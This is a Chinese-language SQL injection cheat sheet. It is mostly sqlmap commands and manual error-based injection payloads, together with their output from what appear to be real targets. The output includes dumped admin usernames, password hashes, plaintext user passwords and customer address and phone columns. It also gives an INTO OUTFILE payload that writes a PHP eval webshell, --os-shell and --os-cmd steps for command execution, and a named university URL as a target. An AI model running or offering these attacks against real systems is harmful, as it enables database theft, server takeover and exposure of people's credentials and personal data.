SqlMap 基础注入命令
aspx注入笔记:
sqlmap -u “http://www.xxxxxxxx.com/userhome/ajax/getaddressbase.aspx?cityid=1″ -v 1 -f
/******************
[02:54:48] [INFO] testing Microsoft SQL Server
[02:54:48] [INFO] confirming Microsoft SQL Server
[02:54:48] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: active fingerprint: Microsoft SQL Server 2005
[02:54:48] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) – 2 times
******************/
获取当前用户名字
sqlmap -u “http://www.xxxxxxxx.com/userhome/ajax/getaddressbase.aspx?cityid=1″ -current-user
获取当前数据库名字
sqlmap -u “http://www.xxxxxxxx.com/userhome/ajax/getaddressbase.aspx?cityid=1″ -current-db
查看当前用户 帐号
sqlmap -u “http://www.xxxxxxxx.com/userhome/ajax/getaddressbase.aspx?cityid=1″ –privileges
执行cmd命令
sqlmap -u “http://www.xxxxxxxx.com/userhome/ajax/getaddressbase.aspx?cityid=1″ –os-cmd=”net stop policyagnet”
执行sql命令
sqlmap -u “http://www.xxxxxxxx.com/userhome/ajax/getaddressbase.aspx?cityid=1″ –sql-shell
系统交互shell
sqlmap -u “http://www.xxxxxxxx.com/userhome/ajax/getaddressbase.aspx?cityid=1″ –os-shell
反弹shell
sqlmap -u “http://www.xxxxxxxx.com/userhome/ajax/getaddressbase.aspx?cityid=1″ –os-shell
高级注入
多参数 通过-p指定 单个参数
sqlmap -u “http://xxx.xxx.xxx/xx.php?name=111&id=1&pid=101″ -p name
1:列数据库
sqlmap -u “http://www.xxxxxxxx.com/userhome/ajax/getaddressbase.aspx?cityid=1″ –tables
遍历所有的数据库
sqlmap -u “http://www.xxxxxxxx.com/userhome/ajax/getaddressbase.aspx?cityid=1″ –dbs
1
2
2:列出 XX库下面的所有表名字 -D xx
sqlmap -u “http://www.xxxxxxxx.com/userhome/ajax/getaddressbase.aspx?cityid=1″ -D msdb –tables
3
4
3:列出某个表下面的 字段
sqlmap -u “http://www.xxxxxxxx.com/userhome/ajax/getaddressbase.aspx?cityid=1″ -D weijienewdb -T EAdmin –columns
****
sqlmap -u “http://www.xxxxxxxx.com/userhome/ajax/getaddressbase.aspx?cityid=1″ -D weijienewdb -T EAddress –columns
EAddress
*****
Database: weijienewdb
Table: EAdmin
[8 columns]
+—————+———-+
| Column | Type |
+—————+———-+
| AdminName | varchar |
| AdminPassword | varchar |
| AdminStatus | int |
| ID | int |
| LastAccess | datetime |
| Permission | varchar |
| RealName | varchar |
| Rem | varchar |
+—————+———-+
4:爆字段内容
sqlmap -u “http://www.xxxxxxxx.com/userhome/ajax/getaddressbase.aspx?cityid=1″ -D weijienewdb -T EAdmin -C AdminName –dump
Database: weijienewdb
Table: EAdmin
[3 entries]
+———–+
| AdminName |
+———–+
| admin |
| hzweijie |
| ihangjing |
+———–+
sqlmap -u “http://www.xxxxxxxx.com/userhome/ajax/getaddressbase.aspx?cityid=1″ -D weijienewdb -T EAdmin -C AdminPassword –dump
Database: weijienewdb
Table: EAdmin
[3 entries]
+———————————-+
| AdminPassword |
+———————————-+
| 5a3d3ff3726166cfcdafd12b128098b0 |
| a10857e51018b45c925b599222557517 |
| c7b34dc8de164efca48e088119840f98 |
+———————————-+
5:脱裤
| EAddress
sqlmap -u “http://www.xxxxxxxx.com/userhome/ajax/getaddressbase.aspx?cityid=1″ -D weijienewdb -T EAddress -C Address,Phone,Mobilephone,DataID,rim_address –dump –threads=10 –start=1 –stop=10
–start –stop 多少条数据
+————-+———-+
| Column | Type |
+————-+———-+
| Address | varchar |
| AddTime | datetime |
| BuildingID | int |
| DataID | int |
| Lat | varchar |
| Lng | varchar |
| Mobilephone | varchar |
| Phone | varchar |
| Pri | int |
| Receiver | varchar |
| rim_address | varchar |
| rim_num | int |
| rim_parity | int |
| rim_type | int |
| Tab | varchar |
| UserID | int |
| ZoneCode | varchar |
| ZoneName | varchar
asscee 注入笔记
1、sqlmap.py -u "注入地址" 判断是否有注入
猜表 2、sqlmap.py -u "注入地址" --tables
猜字段 3、sqlmap.py -u "注入地址" --columns -T admin(表名)
猜内容 4、sqlmap.py -u "注入地址" --dump -T admin -C username,password --dump
cookie注入笔记:
1、sqlmap -u "注入地址asp的" --cookie "id=数字" --table --level 2 判断数据库
2、sqlmap -u "注入地址asp的" --cookie "id=数字" --columns -T 表段(admin) --level 2
3、sqlmap -u "注入地址asp的" --cookie "id=数字" --dump -T admin -C "username,password" --level 2
mysql数据库注入笔记:
1、sqlmap -u 注入地址php --dbs 获取数据库
2、sqlmap -u 注入地址php -D 数据库名 --tables 获取数据库中的表
3、sqlmap -u 注入地址php -D 数据库名 -T 表名 --columns 获取字段
4、sqlmap -u 注入地址php -D 数据库名 -T 表名 -C id,字段名,表名 --dump 获取账号密码
PHP后台登陆框手工注入语句:
'and(select 1 from(select count(*),concat((select concat(相关函数1,0x20,相关函数2,0x20,......) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
1.爆表名
'and(select 1 from(select count(*),concat((select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
'and(select 1 from(select count(*),concat((select concat(table_name) from information_schema.tables where table_schema=database() limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
'and(select 1 from(select count(*),concat((select concat(table_name) from information_schema.tables where table_schema=database() limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
2.爆列名
'and(select 1 from(select count(*),concat((select concat(column_name) from information_schema.columns where table_name=表名的Hex limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
'and(select 1 from(select count(*),concat((select concat(column_name) from information_schema.columns where table_name=表名的Hex limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
'and(select 1 from(select count(*),concat((select concat(column_name) from information_schema.columns where table_name=表名的Hex limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
3.爆用户和密码
'and(select 1 from(select count(*),concat((select concat(username,0x20,password) from admin limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
'and(select 1 from(select count(*),concat((select concat(username,0x20,password) from admin limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
'and(select 1 from(select count(*),concat((select concat(username,0x20,password) from admin limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
4.导出Webshell
'or 1 AND (SELECT id FROM the_users limit 1 INTO OUTFILE 'D:/sub/jw/safe1.php' lines terminated by '<!--?php eval($_POST[safe])?-->') #
交互写shell及命令执行:
注意:写shell前提条件 (1.必须是root权限 2.必须知道网站路径 3.GPC设置为off)
--current -user
sqlmap -u 注入地址 --current -user查看用户权限
sqlmap -u 注入地址 --os-cmd=ipconfig 执行完选择4 php
回车 指定根目录地址:如 D:/WWW/ 回车
如何获得一个shell
sqlmap -u 注入地址 --os-shell 执行完选择4 php 回车
指定根目录地址:如 D:/WWW/ 回车
执行完后根目录生成2个文件打开可以上传
tmpuoiuz.php
tmpbxbxz.php
+------------+-----------+
| user_pwd | user_name |
+------------+-----------+
| wsadmin | admin |
| qianqian88 | pub |
| wsbee123 | 阙明毅 |
| taobao | 淘宝 |
| admin | admin |
+------------+-----------+
D:/Web/
伪静态注入:
sqlmap -u http://sfl.fzu.edu.cn/index.php/Index/view/id/40*.html --dbs
存在注入的地址加个“*”建。
下同mysql注入一样
[课程]Android-CTF解题方法汇总!